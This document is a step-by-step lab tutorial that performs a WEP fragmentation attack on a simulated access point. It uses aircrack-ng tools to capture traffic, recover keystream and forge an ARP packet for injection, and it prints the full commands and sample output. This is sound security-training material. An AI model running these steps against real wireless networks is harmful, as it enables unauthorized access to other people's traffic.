Introduction
In this lab, you will learn how to perform a fragmentation attack against a network encrypted with WEP (Wired Equivalent Privacy). The fragmentation attack is a technique that allows an attacker to obtain a small amount of the WEP keystream (specifically, the Pseudo-Random Generation Algorithm or PRGA) without knowing the WEP key itself.
Once this keystream is obtained, it can be used to create new, valid encrypted packets. These forged packets can then be injected back into the network to stimulate traffic, which is a crucial step in cracking the full WEP key.
You will use the aircrack-ng suite of tools to accomplish this. The process involves monitoring the target network, launching the fragmentation attack to get a PRGA XOR file, and then using that file to forge an ARP packet.
Obtain a Data Packet from the Target AP with airodump-ng
In this step, you will prepare your wireless interface for monitoring and then use airodump-ng to capture traffic from the target Access Point (AP). The goal is to capture at least one data packet, which is required for the fragmentation attack.
First, you need to put your wireless interface into monitor mode. This mode allows the network card to listen to all Wi-Fi traffic in the air, not just traffic addressed to it. We will use the airmon-ng command on the wlan1 interface.
Execute the following command in your terminal:
sudo airmon-ng start wlan1
This command will create a new monitor mode interface, typically named wlan1mon. The output will confirm the new interface name.
PHY Interface Driver Chipset
phy1 wlan1 mac80211_hwsim Software simulator
(monitor mode enabled on wlan1mon)
Now, use airodump-ng to find our target AP, "TestWEP", and capture its traffic to a file. We will specify the BSSID (02:00:00:00:00:00), channel (1), and a file prefix (capture) for the output files.
Run this command. Let it run for about 30-60 seconds until you see the #Data count for the AP increase, which indicates data packets are being captured.
sudo airodump-ng --bssid 02:00:00:00:00:00 -c 1 -w capture wlan1mon
You will see an output similar to this. Wait for the #Data column to show a value greater than 0.
CH 1 ][ Elapsed: 30 s ][ 2023-10-27 10:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:00:00 -30 25 5 1 1 54 WEP WEP TestWEP
BSSID STATION PWR Rate Lost Frames Probe
Once you see that data packets have been captured, press Ctrl+C to stop airodump-ng. You can use the ls command to see the generated capture file, which will be named capture-01.cap.
Start the Fragmentation Attack with aireplay-ng -5
In this step, you will launch the fragmentation attack using aireplay-ng. This attack listens for a packet from the target AP, and once it captures one, it will use it to try and determine the PRGA keystream.
The command for this attack is aireplay-ng -5. You need to specify the BSSID of the target AP with the -b flag and the name of your monitor interface.
Execute the following command to start the attack.
sudo aireplay-ng -5 -b 02:00:00:00:00:00 wlan1mon
After running the command, aireplay-ng will start listening for a suitable packet. The terminal will display a message indicating that it is waiting.
Waiting for a data packet...
Read 221 packets...
The tool will continue to read packets until it finds one that can be used for the attack. In the next step, you will interact with this process once a suitable packet is found. For now, just let it run.
Wait for the 'Use this packet' Message from aircrack-ng
In this step, you will continue the process started with aireplay-ng. After a short while, aireplay-ng should capture a usable packet and will prompt you for confirmation.
The tool will display the packet details and ask if you want to use it.
Waiting for a data packet...
Read 280 packets...
A suitable packet found!
Size: 68
1. Use this packet? (y/n)
When you see the Use this packet? (y/n) prompt, type y and press Enter.
y
Upon confirmation, aireplay-ng will attempt to reconstruct the PRGA from the packet. If successful, it will save the keystream to a .xor file in your current directory (~/project). The output will look something like this:
Saving chosen packet to replay_src-1027-100500.cap
Trying to get 68 bytes of keystream
Got keystream!!
Saved keystream in fragment-1027-100501.xor
Now you can build a packet with packetforge-ng
This confirms that the attack was successful and the keystream has been saved. The .xor file is the key to forging new packets.
Generate a PRGA XOR File from the Successful Attack
In this step, you will confirm that the PRGA keystream file was successfully created by the fragmentation attack. This file, which has a .xor extension, contains the piece of the keystream that we recovered.
As you saw in the output from the previous step, aireplay-ng automatically saves the file. You can verify its existence using the ls -l command to list the files in your current directory.
ls -l
The output should show several files, including the capture-01.cap file from airodump-ng and, most importantly, the new .xor file. The filename will vary based on the date and time.
total 20
-rw-r--r-- 1 root root 119 Oct 27 10:02 capture-01.cap
-rw-r--r-- 1 root root 68 Oct 27 10:05 fragment-1027-100501.xor
-rw-r--r-- 1 root root 114 Oct 27 10:01 hostapd-wep.conf
-rw-r--r-- 1 root root 96 Oct 27 10:05 replay_src-1027-100500.cap
The presence of the fragment-*.xor file confirms that you have the necessary component to forge a new packet in the next step.
Use the XOR File to Forge ARP Packets for Injection
In this step, you will use the recovered PRGA keystream to forge a new packet. We will create an ARP request packet using packetforge-ng. This forged packet can then be injected into the network to generate more traffic, which is useful for other attacks like cracking the WEP key.
First, you need to know the MAC address of your attacking interface (wlan1). You can find this with the ip addr command.
ip addr show wlan1
The output will show your MAC address. In this simulated environment, it is 02:00:00:00:01:00.
3: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
Now, construct the packetforge-ng command.
-0: Specifies an ARP request packet.-a: The BSSID of the target AP (02:00:00:00:00:00).-h: The source MAC address (your MAC,02:00:00:00:01:00).-k: The destination IP address (we'll use a common broadcast IP,192.168.1.255).-l: The source IP address (we'll use a common source IP,192.168.1.100).-y: The path to the.xorfile. We can use$(ls *.xor)to automatically use the file.-w: The name of the output file for our forged packet, e.g.,arp-packet.cap.
Run the command:
packetforge-ng -0 -a 02:00:00:00:00:00 -h 02:00:00:00:01:00 -k 192.168.1.255 -l 192.168.1.100 -y $(ls *.xor) -w arp-packet.cap
The tool will confirm that it has created the packet.
Wrote packet to arp-packet.cap
You have now successfully created a valid, encrypted ARP packet without knowing the WEP key. You can verify its creation with ls. This packet is now ready to be injected into the network.
Summary
In this lab, you successfully performed a WEP fragmentation attack. You have learned a fundamental technique in legacy Wi-Fi security analysis.
You started by setting up a monitor mode interface with airmon-ng and capturing data packets from a target AP using airodump-ng. Then, you launched the core fragmentation attack with aireplay-ng -5, which allowed you to recover a portion of the WEP keystream.
Finally, you used the recovered keystream and packetforge-ng to create a custom, encrypted ARP request packet from scratch. This forged packet is a critical tool for more advanced attacks, such as ARP request replay attacks, which rapidly generate the thousands of packets needed to crack a WEP key.